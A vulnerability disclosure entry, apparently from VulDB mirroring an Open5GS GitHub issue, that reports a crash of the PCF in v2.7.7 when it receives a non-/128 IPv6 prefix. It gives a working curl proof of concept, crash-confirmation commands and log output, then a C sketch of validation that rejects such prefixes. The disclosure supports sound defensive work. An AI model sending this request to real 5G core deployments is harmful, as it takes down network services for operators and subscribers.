| Title | Open5gs PCF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
PCF crashes when `SmPolicyContextData.ipv6AddressPrefix` is syntactically valid
but not `/128`.
The handler asserts that `pcf_sess_set_ipv6prefix()` succeeds:
```c
ogs_assert(true ==
    pcf_sess_set_ipv6prefix(sess, SmPolicyContextData->ipv6_address_prefix));
```
Inside `pcf_sess_set_ipv6prefix()`, the parsed prefix length is required to be
exactly `OGS_IPV6_128_PREFIX_LEN`:
```c
ogs_assert(sess->ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN);
```
So a valid prefix such as `2001:db8::1/64` becomes a process-killing assert.
### Steps to reproduce
```bash
IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' pcf)
curl --http2-prior-knowledge -m 5 -sS -i \
  -X POST "http://$IP/npcf-smpolicycontrol/v1/sm-policies" \
  -H 'content-type: application/json' \
  --data '{"supi":"imsi-001010000000002","pduSessionId":2,"pduSessionType":"IPV6","dnn":"internet","notificationUri":"http://127.0.0.1:9999/cb","ipv6AddressPrefix":"2001:db8::1/64","sliceInfo":{"sst":1,"sd":"000001"}}'
```
Then check:
```bash
docker logs --since 2026-04-10T18:37:20Z pcf
docker inspect -f '{{.RestartCount}} {{.State.StartedAt}}' pcf
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
04/10 18:37:20.063: [pcf] FATAL: pcf_sess_set_ipv6prefix: Assertion `sess->ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN' failed. (../src/pcf/context.c:675)
The container restarted automatically after the crash.
```
### Expected behaviour
PCF should reject non-`/128` prefixes with a normal HTTP error response.
### Observed Behaviour
The connection is reset and the PCF process aborts on the prefix-length assertion.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Source | ⚠️ https://github.com/open5gs/open5gs/issues/4439 |
|---|
| User | LinZiyu (UID 94035) |
|---|
| Submission | 2026-04-20 20:37 (1 month ago) |
|---|
| Moderation | 2026-05-09 09:35 (19 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 362441 [Open5GS up to 2.7.7 PCF /src/pcf/context.c pcf_sess_set_ipv6prefix SmPolicyContextData.ipv6AddressPrefix denial of service] |
|---|
| Points | 20 |
|---|
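
The expected behaviour in the report (reject non-`/128` prefixes with a normal HTTP error instead of asserting) can be sketched as follows. This is an added example, not Open5GS code or the project's fix: `parse_ipv6_prefix()`, `check_ipv6_address_prefix()`, the `IPV6_128_PREFIX_LEN` stand-in and the choice of status 400 are assumptions made for illustration.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IPV6_128_PREFIX_LEN 128 /* stand-in for OGS_IPV6_128_PREFIX_LEN */

/* Hypothetical helper: split "addr/len" and parse both parts strictly.
 * Returns 0 on success, -1 on any syntax error. */
static int parse_ipv6_prefix(const char *s, struct in6_addr *addr, int *len)
{
    char buf[INET6_ADDRSTRLEN];
    const char *slash = s ? strchr(s, '/') : NULL;
    char *end = NULL;
    long v;

    if (!slash || slash == s || (size_t)(slash - s) >= sizeof(buf))
        return -1;
    memcpy(buf, s, (size_t)(slash - s));
    buf[slash - s] = '\0';
    if (inet_pton(AF_INET6, buf, addr) != 1)
        return -1;
    if (slash[1] < '0' || slash[1] > '9') /* no sign, space or empty length */
        return -1;
    v = strtol(slash + 1, &end, 10);
    if (*end != '\0' || v < 0 || v > 128)
        return -1;
    *len = (int)v;
    return 0;
}

/* Hypothetical handler step: attacker-controlled input is turned into an
 * HTTP status (assumed 400) rather than an assertion. 0 means "accepted". */
int check_ipv6_address_prefix(const char *s)
{
    struct in6_addr addr;
    int len;

    if (parse_ipv6_prefix(s, &addr, &len) != 0)
        return 400; /* malformed prefix */
    if (len != IPV6_128_PREFIX_LEN)
        return 400; /* valid syntax, unsupported length: reject, keep running */
    return 0;
}

int main(void)
{
    /* Constructed inputs; the second is the prefix quoted in the report. */
    printf("%d\n", check_ipv6_address_prefix("2001:db8::1/128"));
    printf("%d\n", check_ipv6_address_prefix("2001:db8::1/64"));
    return 0;
}
```

The point of the pattern is that assertions are reserved for internal invariants, while anything derived from a request body goes through a check that returns an error to the caller.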